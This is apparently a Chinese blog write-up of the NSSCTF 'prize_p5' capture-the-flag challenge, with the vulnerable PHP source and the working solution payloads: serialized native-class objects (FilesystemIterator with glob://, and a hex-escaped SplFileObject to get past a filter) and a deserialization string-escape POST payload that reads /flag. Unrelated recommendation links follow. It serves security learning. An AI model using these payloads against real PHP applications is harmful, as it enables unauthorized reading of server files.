[NSSCTF]prize_p5

最新推荐文章于 2024-09-14 21:53:48 发布
最新推荐文章于 2024-09-14 21:53:48 发布
阅读量543 收藏 12
点赞数 17
文章标签: 学习 前端 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756016/article/details/138230512
版权

前言

之前就学过反序列化的字符串逃逸

但是没怎么做题

补一下窟窿

题目

 <?php
  error_reporting(0);

  class catalogue
  {
    public $class;
    public $data;
    public function __construct()
    {
      $this->class = "error";
      $this->data = "hacker";
    }
    public function __destruct()
    {
      echo new $this->class($this->data);
    }
  }
  class error
  {
    public function __construct($OTL)
    {
      $this->OTL = $OTL;
      echo ("hello " . $this->OTL);
    }
  }
  class escape
  {
    public $name = 'OTL';
    public $phone = '123666';
    public $email = 'sweet@OTL.com';
  }
  function abscond($string)
  {
    $filter = array('NSS', 'CTF', 'OTL_QAQ', 'hello');
    $filter = '/' . implode('|', $filter) . '/i';
    return preg_replace($filter, 'hacker', $string);
  }
  if (isset($_GET['cata'])) {
    if (!preg_match('/object/i', $_GET['cata'])) {
      unserialize($_GET['cata']);
    } else {
      $cc = new catalogue();
      unserialize(serialize($cc));
    }
    if (isset($_POST['name']) && isset($_POST['phone']) && isset($_POST['email'])) {
      if (preg_match("/flag/i", $_POST['email'])) {
        die("nonono,you can not do that!");
      }
      $abscond = new escape();
      $abscond->name = $_POST['name'];
      $abscond->phone = $_POST['phone'];
      $abscond->email = $_POST['email'];
      $abscond = serialize($abscond);
      $escape = get_object_vars(unserialize(abscond($abscond)));
      if (is_array($escape['phone'])) {
        echo base64_encode(file_get_contents($escape['email']));
      } else {
        echo "I'm sorry to tell you that you are wrong";
      }
    }
  } else {
    highlight_file(__FILE__);
  }
  ?>

思路

看到字符串逃逸

这题的关键应该是在这里

得到flag的触发点应该是在这里

但是

不知道flag在的文件名是啥

思路就断了

这里还允许我们get传个参数

看看能干嘛

这里找到可变参数

class的值可以自定义

并且通过data穿参

这样通过构造就能命令执行

这里看别人的wp

要用到PHP原生类函数 浅析PHP原生类 - 知乎

这里用FilesystemIterator这个迭代器读取跟目录的值

先构造一下试试

<?php
error_reporting(0);

class catalogue
{
  public $class = 'FilesystemIterator';
  public $data = '/';


}

class escape
{
  public $name = 'OTL';
  public $phone = '123666';
  public $email = 'sweet@OTL.com';
}

$a = new catalogue;
$b = new error;
$c = new escape;
echo serialize($a);

O:9:"catalogue":2:{s:5:"class";s:18:"FilesystemIterator";s:4:"data";s:1:"/";}

只有sys

看别人的wp得到这里要用glob协议找到flag文件

glob协议的用法:

glob:// - 开发帮助文档

O:9:"catalogue":2:{s:5:"class";s:18:"FilesystemIterator";s:4:"data";s:11:"glob:///fl*";}

找到flag

在根目录下有一个flag文件,那么可不可以用一个原生类来读呢?是有的

可以利用SplFileObject这个原生类,但是对object进行了过滤,这里需要使用到反序列化的小知识点:

方便数据的传输,反序列化内容中大写的S表示字符串,可以识别内容里的十六进制
O:9:"catalogue":2:{s:5:"class";S:13:"SplFileO\62ject";s:4:"data";s:5:"/flag";}

这是一个非预期解 主要用到php原生函数的学习

预期解还是要用字符串逃逸

这里对三个post的值有两个限制

一个是email的值不能有/flag

一个是phone的值为数组

我们先构造一下

O:6:"escape":3:{s:4:"name";s:5:"/flag";s:5:"phone";a:1:{i:0;s:2:"aa";}s:5:"email";s:5:"/flag";}

我们可以通过字符串逃逸构造name的值为xxx+“";s:5:"phone";a:1:{i:0;s:2:"aa";}s:5:"email";s:5:"/flag";}”

最后的payload为

name=NSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSShello";s:5:"phone";a:1:{i:0;s:2:"aa";}s:5:"email";s:5:"/flag";}&phone=123&email=111

阿呆不呆@qq
关注
fsf.rar_prize_一等奖_抽奖_抽奖 delphi_抽奖程序
09-23
《Delphi实现抽奖程序设计详解》 在信息技术领域,抽奖程序是常见的应用之一,尤其在各种活动、会议或促销活动中,用于随机选取获奖者。本文将深入探讨如何使用Delphi编程语言来设计一个公平且高效的抽奖程序,实现...
nprize-read-only.tar.gz_Netflix Prize_Only_RMSE_netflix
09-23
《Netflix Prize:优化推荐系统与RMSE的探索》 Netflix Prize是2006年由Netflix公司发起的一项数据挖掘竞赛,其目标是通过改进电影评分预测算法,降低平均绝对误差(Mean Absolute Error,MAE)或均方根误差(Root ...
NSSCTF prize_p5
qq_61142406的博客
05-26 420
源码 <?php error_reporting(0); class catalogue{ public $class; public $data; public function __construct() { $this->class = "error"; $this->data = "hacker"; } public function __destruct() { echo
prize_p5
m0_70819573的博客
03-12 125
2.问题出在abscond函数,它改变了序列化字符串的长度,因为序列化后会标明每个变量的长度,使得部分字符串得以逃逸,并当作序列化字符串处理,比如CTFaaa被换成hacker后,aaa得以逃逸。其实暗示了可以用原生类读取flag的位置,DirectoryIterator FilesystemIterator GlobIterator 都是可以的。突破点有两个,一个是cata参数,再者就是反序列化逃逸了。读取根目录任何带有f的文件,发现flag就在根目录。1.打开环境,审计源码。
[NSSCTF]prize_p1~p5五道题学习
m0_62422842的博客
08-11 1978
五道web题涉及到的知识点也比较多,总结一下便于今后学习
[NSSCTF]prize_p1
m0_73756016的博客
05-02 1290
之前做了p5 才知道还有p1到p4遂来做一下顺便复习一下反序列化对象的析构函数在对象被销毁时触发,对象被销毁的情况。
nssctf刷题
weixin_63231007的博客
04-30 1119
[ZJCTF 2019]NiZhuanSiWei <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'
PHP反序列化字符串逃逸
Aiwin的博客
01-10 1037
PHP反序列化字符串逃逸
first_prize_winner = random.choice(first_prize_pool) if first_prize_pool else None #从名单里去掉: for i in range(len(first_prize_pool)): #遍历每一个候选人 if first_prize_pool[i] == first_prize_winner: #除去对应ID的候选人 first_prize_pool.pop(i) 为什么会出现IndexError: list index out of range的报错?
06-11
在你的代码中,当你使用 `pop` 方法从 `first_prize_pool` 列表中删除元素时,会改变列表的长度,从而导致索引错误。具体来说,当你删除一个元素时,原先位于该元素后面的所有元素的索引都会减少1,这将导致在后面的...
SELECT prize_name, WEEK(created_at) AS week_number, COUNT(*) AS total FROM prize_winners GROUP BY prize_name, week_number ORDER BY week_number DESC, total DESC LIMIT 5;
06-13
这是一个获取中奖奖品的周排名的 SQL 语句,根据中奖信息表 prize_winners 中的创建时间 created_at 对中奖信息进行分组,并统计每个奖品在每周内的中奖数量,同时按照周数和中奖数量进行降序排列,最后只取前 5 条...
netflix_prize_中的协同过滤算法.ppt
05-29
netflix_prize_中的协同过滤算法.ppt
NSSCTF web题记录
热门推荐
m0_64815693的博客
11-08 1万+
[GXYCTF 2019]BabyUpload [GKCTF 2020]CheckIN [NISACTF 2022]babyserialize [NISACTF 2022]popchains [NSSRound#4 SWPU]1zweb prize_p1 prize_p5 [NISACTF 2022]middlerce [SWPUCTF 2021 新生赛]babyunser [TQLCTF 2022]simple_bypass
java抽奖详细介绍
街角有人祝福,巷口有人哭~
12-26 1052
前言:应项目中有需求做一个抽奖活动,所以我去看了很多篇文章,取了其中一篇文章,做了修改.达到了我的需求, 思路: 1.先计算权重,然后得到区域, 2.随机一个随机数,判断在哪个区域,就得到相应的奖品     分析:如上图,为了便于计算和理解,可以设置每种奖品的权重分别为1,2,3,4,所以被抽到的概率分别为0.1,0.2,0.3,0.4(本次活动中奖概率为100%)。   先生成一...
NSSCTF-prize5
Monica的博客
11-04 770
题目 <?php error_reporting(0); class catalogue{ public $class; public $data; public function __construct() { $this->class = "error"; $this->data = "hacker"; } public function __destruct() { echo
[phar反序列化][NSSCTF]prize_p1
cosmoslin的博客
10-16 1251
prize_p1 考点:phar反序列化 <META http-equiv="Content-Type" content="text/html; charset=utf-8" /> <?php highlight_file(__FILE__); class getflag { function __destruct() { echo getenv("FLAG"); } } class A { public $config; function
shader 案例学习笔记之将坐标系分成4个象限
localhost
09-13 209
坐标系被分成了4个单元格,每个单元格都有唯一的索引,后续就可以根据索引去渲染。
UEFI学习笔记(五):EDK II PCD的概念、类型、使用
qq_44189622的博客
09-11 846
如果在BIOS里面有一些模块是binary方式集成进来的而这些binary又需要用到PCD(用于Binary Release),那么这些Binary集成的要用到的PCD就必须要设置为。PCD的值存在memory里面,下次启动时,上次更改的值丢失了,每次启动都是从default值开始。是存在VPD空间的(在FLASH上,只读),一般是出厂配置。如果platform是从源码build出来的,没有binary在里面的时候,PCD用的都是。作用域在一个模块中(模块级的),可以在Binary Level进行修改。
计算几何学习
网安小白
09-12 444
学习计算几何过程中对经典算法的记录
看Threejs好玩示例,学习创新与技术(二)
最新发布
htsitr2的专栏
09-14 481
它的主要特点是确保生成的点之间保持一定的最小距离,从而避免点的聚集。这种方法在计算机图形学、游戏开发、物理模拟等领域中非常有用,尤其是在需要生成自然分布的对象(如树木、石头等)时。如果不进行裁剪,那么效果如下(初步的锯齿感是因为矩形内采样的结果)。为啥这么复杂呢,为啥不开始存储每个方块的UV呢?下面代码的vTexCoords(=savedModelMatrix,已修改)记录方块所在的位置,vWorldPosition表示方块中像素的偏移。在上面那副图中,聪明的你一定初步猜到了每个方块的纹理是怎么得到的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值